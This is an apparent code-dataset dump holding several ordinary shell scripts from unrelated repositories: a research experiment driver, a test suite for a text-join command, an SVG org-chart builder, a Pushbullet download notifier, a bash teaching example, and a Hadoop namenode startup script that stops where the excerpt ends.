blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
dd6c19cfd6d164fbfe21264f109b3f95483773e2
|
Shell
|
tkusmierczyk/badges
|
/src/experiments/RUN_ALL_EXPERIMENTS.sh
|
UTF-8
| 2,739
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/bash
# Driver script: runs every sliding-window experiment for the badges data —
# test-statistic fitting, per-window user extraction, plotting, and SMD
# score validation. Expects the sliding_window*.py scripts in the cwd.
#Input and output directory
DIR="../../data/badges/"
#Sliding window size
WIN="60"
#Badge introduction time - Tag Wiki Edits
TAGEDIT_BADGE="756"
#Badge introduction time - bounties
BOUNTY_BADGE="703.5"
#############################################################
echo "CALCULATING SLIDING WINDOW TEST STATISTICS"
CPUS=3 #How many cores to use
# Flags shared by the fitting/extraction runs; left unquoted below on
# purpose so the shell splits it into separate arguments.
PARAMS="-p fitting_mode=3 -c $CPUS"
# Common flags: -z/-e = start/end day, -w = window width, -b = badge intro day.
python sliding_window.py $PARAMS -i $DIR/tagedits/tageditor.tsv -o $DIR/tagedits/tageditor_w${WIN}_fitting.tsv -z 690 -e 900 -w $WIN -m 5 -s 1 -b $TAGEDIT_BADGE
python sliding_window.py $PARAMS -i $DIR/bounties/bounty1.tsv -o $DIR/bounties/bounty1_w${WIN}_fitting.tsv -z 500 -e 1500 -w $WIN -m 5 -s 1 -b $BOUNTY_BADGE
python sliding_window.py $PARAMS -i $DIR/bounties/bounty2.tsv -o $DIR/bounties/bounty2_w${WIN}_fitting.tsv -z 500 -e 1500 -w $WIN -m 5 -s 1 -b $BOUNTY_BADGE
#############################################################
echo "EXTRACTION OF USERS APPEARING IN EACH SLIDING WINDOW"
python sliding_window_extract_users.py $PARAMS -i $DIR/tagedits/tageditor.tsv -o $DIR/tagedits/tageditor_w${WIN}_users.tsv -z 690 -e 900 -w $WIN -m 5 -s 1 -b $TAGEDIT_BADGE
python sliding_window_extract_users.py $PARAMS -i $DIR/bounties/bounty1.tsv -o $DIR/bounties/bounty1_w${WIN}_users.tsv -z 500 -e 1500 -w $WIN -m 5 -s 1 -b $BOUNTY_BADGE
python sliding_window_extract_users.py $PARAMS -i $DIR/bounties/bounty2.tsv -o $DIR/bounties/bounty2_w${WIN}_users.tsv -z 500 -e 1500 -w $WIN -m 5 -s 1 -b $BOUNTY_BADGE
#############################################################
echo "PLOTTING SLIDING WINDOW RESULTS"
# Plot p-values per window center; per-dataset axis limits and smoothing
# are packed into the -p key=value list.
python sliding_window_plot.py -z 720 -e 840 -i $DIR/tagedits/tageditor_w${WIN}_fitting.tsv -b $TAGEDIT_BADGE -l "Tag Editor intro" -p "title=,legend=t,xlabel=sliding window center [days],ylabel=p-value,xmin=720,xmax=840,ymax=0.0015,smoothing=5,smoothing_mode=1,bw=0.1"
python sliding_window_plot.py -i $DIR/bounties/bounty1_w${WIN}_fitting.tsv -b $BOUNTY_BADGE -l "Promoter intro" -p "title=,legend=t,xlabel=sliding window center [days],ylabel=p-value,xmax=1000,xmin=650,ymax=0.005,bw=0.6,smoothing=5,smoothing_mode=1"
python sliding_window_plot.py -i $DIR/bounties/bounty2_w${WIN}_fitting.tsv -b $BOUNTY_BADGE -l "Investor intro" -p "title=,legend=t,xlabel=sliding window center [days],ylabel=p-value,xmax=1000,xmin=650,ymax=0.001,bw=0.2,smoothing=5,smoothing_mode=1"
#############################################################
echo "VALIDATING SMD SCORES"
python sliding_window_extract_users_smd.py -i $DIR/tagedits/tageditor_w${WIN}_users.tsv
python sliding_window_extract_users_smd.py -i $DIR/bounties/bounty1_w${WIN}_users.tsv
python sliding_window_extract_users_smd.py -i $DIR/bounties/bounty2_w${WIN}_users.tsv
| true
|
49ddcf35d54f447524f9969257c2d8fa7d3ffcee
|
Shell
|
usp-engineers-community/Open-usp-Tukubai
|
/TEST/cjoin1x.test
|
UTF-8
| 11,811
| 3.96875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#!/usr/local/bin/bash -xv # コマンド処理系の変更例
#
# test script of cjoin1x
#
# usage: [<test-path>/]calclock.test [<command-path> [<python-version>]]
#
# <test-path>は
# 「現ディレクトリーからみた」本スクリプトの相対パス
# または本スクリプトの完全パス
# 省略時は現ディレクトリーを仮定する
# <command-path>は
# 「本スクリプトのディレクトリーからみた」test対象コマンドの相対パス
# またはtest対象コマンドの完全パス
# 省略時は本スクリプトと同じディレクトリーを仮定する
# 値があるときまたは空値("")で省略を示したときはあとにつづく<python-version>を指定できる
# <python-version>は
# 使用するpython処理系のversion(minor versionまで指定可)を指定する
# (例 python2 python2.6 phthon3 python3.4など)
# 単にpythonとしたときは現実行環境下でのdefault versionのpythonを使用する
# 文字列"python"は大文字/小文字の区別をしない
# 省略時はpythonを仮定する
name=cjoin1x # name of the command under test
testpath=$(dirname $0) # directory holding this script, taken from $0
cd $testpath # run from the script's own directory
if test "$2" = ""; # if <python-version> ($2) was not given
then pythonversion="python" # use the default python
else pythonversion="$2" # otherwise use the requested python version
fi
if test "$1" = ""; # if <command-path> ($1) was not given
then commandpath="." # the command under test lives in the current directory
else commandpath="$1" # otherwise it lives in the given directory
fi
com="${pythonversion} ${commandpath}/${name}" # command prefix that runs the target via python
tmp=$(mktemp)
ERROR_CHECK(){
# Return silently when every stage of the most recent pipeline exited 0;
# otherwise print the message in $1, report NG, remove temp files and abort.
# The check joins PIPESTATUS and strips spaces and '0' characters: an empty
# result means all statuses were 0 (any non-zero status keeps at least one
# non-zero digit). NOTE(review): PIPESTATUS reflects the last pipeline run
# before this call (normally the preceding diff/test) — callers must invoke
# this immediately after the command being checked.
[ "$(echo ${PIPESTATUS[@]} | tr -d ' 0')" = "" ] && return
echo $1
echo "${pythonversion} ${name}" NG
rm -f $tmp-*
exit 1
}
BOMandEOLvariation(){ # generate a BOM+CRLF file ($2) and a BOM+CR file ($3) from a BOM-less LF file ($1)
# Exactly three file arguments are required.
[ $# -eq 3 ]; ERROR_CHECK "TESTスクリプト内のBOMandEOLvariation()でファイル指定が不正"
# Fix: the original embedded '\xEF\xBB\xBF' inside a single-quoted awk
# program; the shell closed the quotes around it, awk saw an empty
# (uninitialized) variable, and no BOM was ever written — nor did the first
# output use CRLF as documented. Emit the UTF-8 BOM explicitly with printf
# (octal escapes are portable) and set awk's ORS for the line terminators.
{ printf '\357\273\277'; awk 'BEGIN {ORS = "\r\n"} {print $0}' $1; } > $2
{ printf '\357\273\277'; awk 'BEGIN {ORS = "\r"} {print $0}' $1; } > $3
}
###########################################
# TEST1
# 通常の連結
# 行頭/行末の空白削除と行中の連続空白の単空白化
cat << FIN > $tmp-master
1 東京1
1 東京2
2 大阪1
2 大阪2
FIN
cat << FIN > $tmp-tran
3 栄
2 京橋
3 金山
1 上野
1 新宿
4 天神
2 難波
3 熱田
2 梅田
4 博多
FIN
cat << FIN > $tmp-ans
2 大阪1 京橋
2 大阪2 京橋
1 東京1 上野
1 東京2 上野
1 東京1 新宿
1 東京2 新宿
2 大阪1 難波
2 大阪2 難波
2 大阪1 梅田
2 大阪2 梅田
FIN
${com} key=1 $tmp-master $tmp-tran >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST1-1 error"
# master/tranの各行において行頭/行末の空白は削除され 行中の連続空白は単空白に変換される
cat << FIN > $tmp-master
1 東京1
1 東京2
2 大阪1
2 大阪2
FIN
cat << FIN > $tmp-tran
3 栄
2 京橋
3 金山
1 上野
1 新宿
4 天神
2 難波
3 熱田
2 梅田
4 博多
FIN
${com} key=1 $tmp-master $tmp-tran >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST1-2 error"
###########################################
# TEST2
cat << FIN > $tmp-ng-ans
3 栄
3 金山
4 天神
3 熱田
4 博多
FIN
# ngオプションを使ってマッチしないレコードをファイルディスクリプター指定をして出力します。
${com} +ng3 key=1 $tmp-master $tmp-tran > $tmp-ok-out 3> $tmp-ng-out
diff $tmp-ng-ans $tmp-ng-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST2-1 error"
# ngオプションでファイルディスクリプター指定を省略すると、マッチしないレコードは標準エラー出力へ出力します。
${com} +ng key=1 $tmp-master $tmp-tran > $tmp-ok-out 2> $tmp-ng-out
diff $tmp-ng-ans $tmp-ng-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST2-2 error"
###########################################
# TEST3
# 連続するキーフィールドを指定して連結
cat << FIN > $tmp-master
A A nameA1
A A nameA2
A B nameAB
FIN
cat << FIN > $tmp-tran
x x B A x x
x x A B x x
x x A A x x
FIN
cat << FIN > $tmp-ans
x x A B nameAB x x
x x A A nameA1 x x
x x A A nameA2 x x
FIN
${com} key=3/4 $tmp-master $tmp-tran > $tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST3 error"
###########################################
# TEST4
# 離れたキーフィールドの場合(通常は使用しません)
cat << FIN > $tmp-master
B a A nameA1
B b A nameA2
C c A nameAC
FIN
cat << FIN > $tmp-tran
x A w B x
x C x A x
x B y C x
x B z A x
FIN
cat << FIN > $tmp-ans
x C x A c nameAC x
x B z A a nameA1 x
x B z A b nameA2 x
FIN
${com} key=4@2 $tmp-master $tmp-tran > $tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST4 error"
###########################################
# TEST5
# 離れたキーフィールドの場合(通常は使用しません)←3フィールド
cat << FIN > $tmp-master
x B a A nameA1
x B b A nameA2
x C c A nameAC
FIN
cat << FIN > $tmp-tran
x A w B x
x C x A x
x B y C x
x B z A x
FIN
cat << FIN > $tmp-ans
x C x A c nameAC x
x B z A a nameA1 x
x B z A b nameA2 x
FIN
${com} key=4@1@2 $tmp-master $tmp-tran > $tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST5 error"
###########################################
#TEST6
# キーリストの重複解消試験(1)←3フィールドの重複解消
cat << FIN > $tmp-master
B a A nameA1
B b A nameA2
C c A nameAC
FIN
cat << FIN > $tmp-tran
x A w B x
x C x A x
x B y C x
x B z A x
FIN
cat << FIN > $tmp-ans
x C x A c nameAC x
x B z A a nameA1 x
x B z A b nameA2 x
FIN
${com} key=4@2@2@4@4@2 $tmp-master $tmp-tran > $tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST6 error"
###########################################
# TEST7
# キーリストの重複解消試験(2)←2フィールドの重複解消
cat << FIN > $tmp-master
x B a A nameA1
x B b A nameA2
x C c A nameAC
FIN
cat << FIN > $tmp-ans
x C x A c nameAC x
x B z A a nameA1 x
x B z A b nameA2 x
FIN
${com} key=4@1@2@1@2@4 $tmp-master $tmp-tran > $tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST7 error"
###########################################
# TEST8
# キーフィールドの列挙指定と範囲指定の連続混用および重複指定解消の試験
# キーフィールドの指定に絶対位置指定とNF相対位置指定を混在させた場合は
# tranのフィールド数は固定でなければならない
cat << FIN > $tmp-master
A A nameA1
A A nameA2
A B nameAB
FIN
cat << FIN > $tmp-tran
x x B A x x
x x A B x x
x x A A x x
FIN
cat << FIN > $tmp-ans
x x A B nameAB x x
x x A A nameA1 x x
x x A A nameA2 x x
FIN
${com} key=3/4@4@3@NF-3/NF-2@4/3 $tmp-master $tmp-tran > $tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST8 error"
###########################################
# TEST9
# TEST1の拡大版
# BOM付きCRLFとBOM付きCRの試験
# 通常の連結
cat << FIN > $tmp-master
1 東京1
1 東京2
2 大阪1
2 大阪2
FIN
cat << FIN > $tmp-tran
3 栄
2 京橋
3 金山
1 上野
1 新宿
4 天神
2 難波
3 熱田
2 梅田
4 博多
FIN
cat << FIN > $tmp-ans
2 大阪1 京橋
2 大阪2 京橋
1 東京1 上野
1 東京2 上野
1 東京1 新宿
1 東京2 新宿
2 大阪1 難波
2 大阪2 難波
2 大阪1 梅田
2 大阪2 梅田
FIN
# 入力用tmpファイルからBOM付きCRLFとBOM付きCRの各ファイルを作る
BOMandEOLvariation $tmp-master $tmp-masterBOMCRLF $tmp-masterBOMCR
BOMandEOLvariation $tmp-tran $tmp-tranBOMCRLF $tmp-tranBOMCR
# BOM付きCRLF
${com} key=1 $tmp-masterBOMCRLF $tmp-tranBOMCRLF >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST9-1 error"
# BOM付きCR
${com} key=1 $tmp-masterBOMCR $tmp-tranBOMCR >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST9-2 error"
# pipe接続 master
# BOM付きCRLF
cat $tmp-masterBOMCRLF | ${com} key=1 - $tmp-tranBOMCRLF >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST9-3 error"
# BOM付きCR
cat $tmp-masterBOMCR | ${com} key=1 - $tmp-tranBOMCR >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST9-4 error"
# pipe接続 tran
# BOM付きCRLF
cat $tmp-tranBOMCRLF | ${com} key=1 $tmp-masterBOMCRLF - >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST9-5 error"
# BOM付きCR
cat $tmp-tranBOMCR | ${com} key=1 $tmp-masterBOMCR - >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST9-6 error"
###########################################
# TEST10
# key指定に絶対位置指定とNF相対位置指定を混在させない場合は
# tranのフィールド数は一定でなくてもよい
# TEST10-1
# tranの後尾の欄をNF相対位置指定でkeyとし
# tranのフィールド数が変化するときの試験
cat << FIN > $tmp-master
1 東京1
1 東京2
2 大阪1
2 大阪2
FIN
cat << FIN > $tmp-tran
栄 a 3
京橋 b x 2
金山 c 3
上野 d 1
新宿 e y z 1
天神 f 4
難波 g 2
熱田 h 3
梅田 i 2
博多 j 4
FIN
cat << FIN > $tmp-ans
京橋 b x 2 大阪1
京橋 b x 2 大阪2
上野 d 1 東京1
上野 d 1 東京2
新宿 e y z 1 東京1
新宿 e y z 1 東京2
難波 g 2 大阪1
難波 g 2 大阪2
梅田 i 2 大阪1
梅田 i 2 大阪2
FIN
${com} key=NF $tmp-master $tmp-tran >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST10-1 error"
# key指定に絶対位置指定とNF相対位置指定を混在させた場合の試験
# TEST10-2
# tranの先頭と後尾の欄をkeyとし
# tranのフィールド数が一定であるとき
cat << FIN > $tmp-master
1 東京1 A 10 X Y
1 東京2 B 20 Z P
1 東京3 D 20 F Q
1 東京4 G 30 I V
2 大阪1 J 10 R b
2 大阪2 O 10 S c
2 大阪3 K 20 T d
2 大阪4 M 20 U e
FIN
cat << FIN > $tmp-tran
3 栄 a 30
2 京橋 b 20
3 金山 c 30
1 上野 d 10
1 新宿 e 20
4 天神 f 40
2 難波 g 20
3 熱田 h 30
2 梅田 i 20
4 博多 j 40
FIN
cat << FIN > $tmp-ans
2 京橋 b 20 大阪3 K T d
2 京橋 b 20 大阪4 M U e
1 上野 d 10 東京1 A X Y
1 新宿 e 20 東京2 B Z P
1 新宿 e 20 東京3 D F Q
2 難波 g 20 大阪3 K T d
2 難波 g 20 大阪4 M U e
2 梅田 i 20 大阪3 K T d
2 梅田 i 20 大阪4 M U e
FIN
${com} key=1@NF $tmp-master $tmp-tran >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST10-2 error"
# TEST10-3
# tranの先頭と後尾の欄をkeyとし
# tranのフィールド数を変化させたとき
cat << FIN > $tmp-tran
3 栄 a 30
2 京橋 b 20 40
3 金山 c 30
1 上野 d 10
1 新宿 e 20
4 天神 f 40
2 難波 g 20
3 熱田 h 30
2 梅田 i 20
4 博多 j 40
FIN
# ${name}のTEST10-3では
# 「key指定において絶対欄位置とNF相対欄位置が混在している状態でtranのフィールド数が変化する」例を実行し、
# エラーメッセージが出るように設定されている
${com} key=1@NF $tmp-master $tmp-tran >$tmp-out 2> /dev/null
[ $? -ne 0 ] ; ERROR_CHECK "TEST10-3 error"
###########################################
rm -f $tmp-*
echo "${pythonversion} ${name}" OK
exit 0
| true
|
3a9ad75b00cc694b15b9c177ff9b37e2db58a04d
|
Shell
|
adamgibbins/bin
|
/urlencode
|
UTF-8
| 313
| 3.296875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env zsh
# Percent-encode the URL given as $1, following the RFC 2396 "unreserved"
# character set (zsh only — relies on zsh parameter expansion flags).
if [[ $# = 0 ]] ; then
echo "Usage: $0 url"
echo "Example: $0 http://www.example.com/test/path?with=some&foo=bar"
echo "Encode a URL."
else
# RFC 2396
setopt extendedglob
# (s::) splits $1 into an array of single characters.
input=( ${(s::)1} )
# For every character outside [A-Za-z0-9_.!~*'()-], substitute %XX where XX
# is the character code in hex, left-padded to two digits with (l:2::0:).
# NOTE(review): assumes single-byte characters — multi-byte UTF-8 input may
# not encode per-byte as RFC 3986 expects; confirm if that matters here.
print ${(j::)input/(#b)([^A-Za-z0-9_.!~*\'\(\)-])/%${(l:2::0:)$(([##16]#match))}}
fi
| true
|
9b2ee213c699c23357d979cfb2fd444d85ed7cfa
|
Shell
|
cremadesign/cdn
|
/mwg/make-orgchart
|
UTF-8
| 5,313
| 3.078125
| 3
|
[] |
no_license
|
#! /usr/bin/env bash
. ~/.bash_profile
# -----
# Org Chart Compiler
# Created by Stephen Ginn
# Modified 2018-11-01
# This script replaces Illustrator-exported <rect> elements with images and links.
# -----
# Check for and Install Missing Dependencies
# NOTE: The RSVG delegate is better at converting the shapes / lines,
# but is ignoring linked svg files.
# brew install imagemagick --with-librsvg
# convert -size 1640x1640 orgchart-linked.svg test.png
source="orgchart-source.svg"
dest="orgchart-linked.svg"
destname=$(basename "$dest" .svg)
tabs 7; tab2=" ";
# This function replaces each placeholder box with the appropriate logo.
logoswap () {
	# Swap an Illustrator-exported <rect> placeholder for the matching partner
	# logo <image>; when the partner has a website, wrap the image in a link.
	# $1 - one line of SVG source containing a '<rect id="..."' placeholder.
	line="$1"
	website="" # optional
	case $line in
	*'<rect id="amf-holdings"'*)
		image_id="amf-holdings"
		image_path="partners/holdings/amf-holdings-black.svgz" ;;
	*'<rect id="amfirst"'*)
		image_id="amfirst"
		image_path="partners/amfirst/color.svgz"
		website="https://www.amfirstinsco.com" ;;
	*'<rect id="new-providence-life"'*)
		image_id="new-providence-life"
		image_path="partners/npl/color.svgz"
		website="https://newprovidencelife.com" ;;
	*'<rect id="oic-holdings"'*)
		image_id="oic-holdings"
		image_path="partners/holdings/oic-holdings-black.svgz" ;;
	*'<rect id="amfirst-ltd"'*)
		image_id="amfirst-ltd"
		image_path="partners/amfirst-ltd/color.svgz" ;;
	*'<rect id="info-lockbox"'*)
		image_id="info-lockbox"
		image_path="partners/lockbox/info-black.svgz"
		website="https://insurancelockbox.com" ;;
	*'<rect id="amf-services"'*)
		image_id="amf-services"
		image_path="partners/holdings/amf-services-black.svgz" ;;
	*'<rect id="amfirst-life"'*)
		image_id="amfirst-life"
		image_path="partners/amfirst-life/center-color.svgz"
		website="https://amfirstlife.com" ;;
	*'<rect id="monitor-life"'*)
		image_id="monitor-life"
		image_path="partners/monitor-life/color.svgz"
		website="https://monitorlife.com" ;;
	*'<rect id="london-america"'*)
		image_id="london-america"
		image_path="partners/london-america/color.svgz" ;;
	*'<rect id="tpm-life"'*)
		image_id="tpm-life"
		image_path="partners/tpm/color.svgz"
		website="https://tpmins.com" ;;
	*'<rect id="amfirst-specialty"'*)
		image_id="amfirst-specialty"
		image_path="partners/amfirst-specialty/color.svgz" ;;
	*'<rect id="afic-administrators"'*)
		image_id="afic-administrators"
		image_path="partners/holdings/afic-administrators-black.svgz" ;;
	*'<rect id="amfirst-capital"'*)
		image_id="amfirst-capital"
		image_path="partners/amfirst-capital/color.svgz" ;;
	*'<rect id="amfirst-holdings"'*)
		# Org Chart Title
		image_id="amfirst-holdings"
		image_path="partners/amfirst-holdings/black.svgz" ;;
	esac
	# As in the original: when no pattern matches, image_id/image_path keep
	# whatever values the previous call left behind.
	image_url="https://cdn.cremadesignstudio.com/mwg/$image_path"
	if [[ $website != "" ]]; then
		echo "${tab2}<a href=\"$website\" target=\"_blank\">"
		echo "${tab2}$line" | sed "s|<rect id=\"$image_id\"|<image xlink:href=\"$image_url\"|g" | sed "s| opacity=\"0.15\"| |g"
		echo "${tab2}</a>"
	else
		echo "$line" | sed "s|<rect id=\"$image_id\"|<image xlink:href=\"$image_url\"|g" | sed "s| opacity=\"0.15\"| |g"
	fi
}
alert -t info "Removing Old Exports..."
rm "$dest"
rm "$destname.min.svg"
rm "$destname.min.svgz"
alert -t info "Making Org Chart..."
IFS=''
while read -r line; do
if [[ $line == *"<svg"* ]]; then
newline="$(echo "$line" | sed "s|<svg|<svg version=\"1.1\" xml:space=\"preserve\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"|g")
<defs>
<style>
.fill-black path {fill:#333;}
line,polyline {stroke:#333; fill:none;}
text, foreignObject {
font-family:'Roboto-Regular','Helvetica Neue', Arial, sans-serif;
font-size: 9.5px;
text-align: center;
}
foreignObject p {margin:0;}
a:hover {cursor: pointer;}
</style>
</defs>"
elif [[ $line == *'<line x1='* ]]; then
newline="$(echo "$line" | sed "s| fill=\"none\" stroke=\"#000\"||g")"
elif [[ $line == *'<polyline points='* ]]; then
newline="$(echo "$line" | sed "s| fill=\"none\" stroke=\"#000\"||g")"
elif [[ $line == *'<text transform='* ]]; then
newline="$(echo "$line" | sed "s| font-size=\"9\" font-family=\"SFProText-Regular, SF Pro Text\"||g")"
elif [[ $line == *'<rect id='* ]]; then
newline="$(logoswap "$line")"
else
newline="$line"
fi
# Print to Destination
echo -e "$newline" >> $dest
done < $source
alert -t info "Exporting SVG and SVGZ Files..."
svgo --disable=mergePaths --disable=convertShapeToPath "$dest" -o "$destname.min.svg"
svgo --disable=mergePaths --disable=convertShapeToPath "$dest" -o - | gzip -cfq9 > "$destname.min.svgz"
alert -t info "Removing Source File..."
# rm "$source"
exit;
| true
|
570b644b2513532d8272149960cfa2230c6454ab
|
Shell
|
lelis-research/PyGames-synthesis
|
/bin/gather_paths_by_config.sh
|
UTF-8
| 1,007
| 3.859375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# This script gathers the paths to the .dat files with the given
# configuration name.
#
# If multiple runs were performed in a SINGLE process, the .dat file
# has "run" prefixing the actual run index. For example:
#
# best_scores_run5_Catcher_sa_no_opt_data.dat
#
# else the .dat file's name should not contain the prefix and the
# name of game comes before the run index. For instance:
#
# best_scores_Catcher_5_sa_no_opt_data.dat
#
# This is to differentiate searches done in different processes/jobs from those
# those done in a single process/job.
#
# Usage: gather_paths_by_config.sh <config> <total_runs> <game> [was_single_process]
config=$1
total_runs=$2
game=$3
was_single_process=$4

paths_file="${config}_paths"

# Start from a clean output file. (The original did "touch" followed by
# "rm", which cancel out; rm -f alone handles a missing file.)
rm -f -- "$paths_file"

echo "# ${config}" >> "$paths_file"

for ((i = 0; i < total_runs; i++)); do
	if [ -z "$was_single_process" ]; then
		echo "best_scores_${game}_${i}_${config}_data.dat" >> "$paths_file"
	else
		# NOTE(review): the double underscore between game and config does not
		# match the single-process example documented above — confirm against
		# the actual .dat file names before "fixing" it.
		echo "best_scores_run${i}_${game}__${config}_data.dat" >> "$paths_file"
	fi
done
| true
|
6a2ba417df7714bd7fe780f03b6f772c2fa87de5
|
Shell
|
shengchen-liu/yt8m
|
/ensemble/model_selection_scripts/extend-step-mean_model.sh
|
UTF-8
| 742
| 2.984375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
model_name="$1"
candidates_conf="$2"
train_path=/Youtube-8M/model_predictions_for_selection/ensemble_train
model_path="${DIR}/../../model/${model_name}"
all_models_conf="${model_path}/all_models.conf"
for candidates in $(cat $candidates_conf); do
echo "$candidates"
train_data_patterns=$(python ${DIR}/get_patterns.py --train_path="$train_path" --candidates="$candidates")
CUDA_VISIBLE_DEVICES=1 python ${DIR}/../eval.py \
--model_checkpoint_path="${model_path}/model.ckpt-0" \
--train_dir="${model_path}" \
--model="MeanModel" \
--echo_gap=True \
--batch_size=1024 \
--eval_data_patterns="$train_data_patterns" | tail -n 1
done
| true
|
e6911cce833b9282bdcab29f295107e243e14fc9
|
Shell
|
FHead/PhysicsHIJetReco2018
|
/CommonCode/script/CombineResult.sh
|
UTF-8
| 493
| 3.984375
| 4
|
[] |
no_license
|
# Combine per-job ROOT output files: every "<base>_<N>.root" group in the
# result directory is hadd-merged into "<CombinedDirectory>/<base>.root".
# Usage: CombineResult.sh <ResultDirectory> [CombinedDirectory]
ResultDirectory=$1
CombinedDirectory=$2

# Fix: quote the tests — unquoted [ -z $1 ] breaks (or mis-evaluates) when
# the argument contains spaces or glob characters.
if [ -z "$1" ]
then
   echo "[Notice] Please specify the directory where the individual results are in!"
   exit
fi

if [ -z "$2" ]
then
   echo "[Notice] Using default combined folder name: CombinedResult"
   CombinedDirectory=CombinedResult
fi

mkdir -p "$CombinedDirectory"

# Derive the unique base names by stripping the trailing "_<index>" from
# every *.root file (rev/cut/rev drops the last '_'-separated field).
# NOTE(review): this still parses ls output; safe only while result file
# names contain no whitespace — which matches the _[0-9]* naming scheme.
for i in $(ls "$ResultDirectory" | grep root$ | rev | cut -d '_' -f 2- | rev | sort | uniq)
do
   hadd -f -k "$CombinedDirectory/${i}.root" "$ResultDirectory"/${i}_[0-9]*.root
done
| true
|
87b94fc2d657c912888cf1b7ab88dfb472748f6f
|
Shell
|
gregolsky/captain-sparrow
|
/docker/compose/assets/notify.sh
|
UTF-8
| 405
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
# Push a Pushbullet note when a Transmission download completes.
# Transmission provides TR_TORRENT_NAME; PUSHBULLET_API_KEY must be set in
# the environment.
MESSAGE_TITLE="Download completed"
MESSAGE_CONTENT="$TR_TORRENT_NAME"

echo "Notifying on download complete $TR_TORRENT_NAME"

# Fix: the payload previously hardcoded the title and body even though the
# two variables above were defined for exactly that purpose; use them (the
# bytes sent are unchanged).
curl -Ss \
    -H "Access-Token: $PUSHBULLET_API_KEY" \
    -H 'Content-Type: application/json' \
    -X POST \
    --data-binary "{ \"type\": \"note\", \"body\": \"$MESSAGE_CONTENT\", \"title\": \"$MESSAGE_TITLE\" }" \
    https://api.pushbullet.com/v2/pushes
| true
|
981a9c03188793265046c473d649252695afc503
|
Shell
|
veltzer/demos-bash
|
/src/examples/core/logical_operators/using_bracket.bash
|
UTF-8
| 1,010
| 3.578125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash -u
# This example shows how to use logical operators when using the '['/'test' shell builtin.
# Note that '[' and '[[' are not the same as '[[' is a shell keyword and not a shell
# builtin and behaves differently.
# Also note that GNU in it's coreutils has a process implementation of both '[' and 'test'
# but these are not usually used as the shell builtins are preferred by bash.
# Notes:
# - if you want to see the documentation of '['/'test' *dont do 'man ['*. Instead
# look at man builtins and look for 'test'.
# - if you wish to do logical operators combined with '[' you must use -a, -o and more.
if [ 'foo' = 'foo' ]
then
true
else
error ${LINENO} "problem" 1
fi
if [ 'foo' != 'bar' ]
then
true
else
error ${LINENO} "problem" 1
fi
if [ 2 != 3 ] && [ 3 != 4 ]
then
true
else
error ${LINENO} "problem" 1
fi
let "a=2"
let "b=2"
if [ $a = 1 ] || [ $b = 2 ]
then
true
else
error ${LINENO} "problem" 1
fi
if [ $a = 2 ] && [ $b = 2 ]
then
true
else
error ${LINENO} "problem" 1
fi
| true
|
66369d265357aea03c0df6048ba4c312d7ad171d
|
Shell
|
KonecKonca/data201FullReport
|
/hadoopHA/1_ha/ha-hdfs/namenode/run.sh
|
UTF-8
| 1,871
| 3.984375
| 4
|
[] |
no_license
|
#!/bin/bash
namedir=`echo ${HDFS_CONF_dfs_namenode_name_dir}`
source ~/.bashrc
if [ -z "${CLUSTER_NAME}" ]; then
echo "Cluster name not specified"
exit 2
fi
function waitUntilJournalNodeAvailable() {
    # Block until the journal node answers HTTP on port 8480, polling every
    # five seconds.
    # Args: $1 - journal node host name.
    local host=$1
    # Fix: the original wrote `until $(curl ...)`, which runs curl in a
    # command substitution and then executes its (empty) stdout as the loop
    # condition (ShellCheck SC2091). It happened to work because an empty
    # command list inherits the substitution's status, but the idiomatic and
    # unambiguous form is to run curl directly as the condition.
    until curl --output /dev/null --silent --head --fail "http://${host}:8480"; do
        echo " >> Journal node ${host} not available, waiting for 5 more seconds"
        sleep 5
    done
}
echo "WAITING UNTIL for journal nodes to become available..."
waitUntilJournalNodeAvailable ${JOURNAL_NODE_1}
waitUntilJournalNodeAvailable ${JOURNAL_NODE_2}
waitUntilJournalNodeAvailable ${JOURNAL_NODE_3}
if [[ ! -z "${IS_STANDBY_NODE}" ]]; then
echo "Formatiting and starting failover controller"
${HADOOP_PREFIX}/bin/hdfs zkfc -formatZK -force -nonInteractive
${HADOOP_PREFIX}/bin/hdfs --config ${HADOOP_CONF_DIR} --daemon start zkfc
echo "Starting StandBy NameNode..."
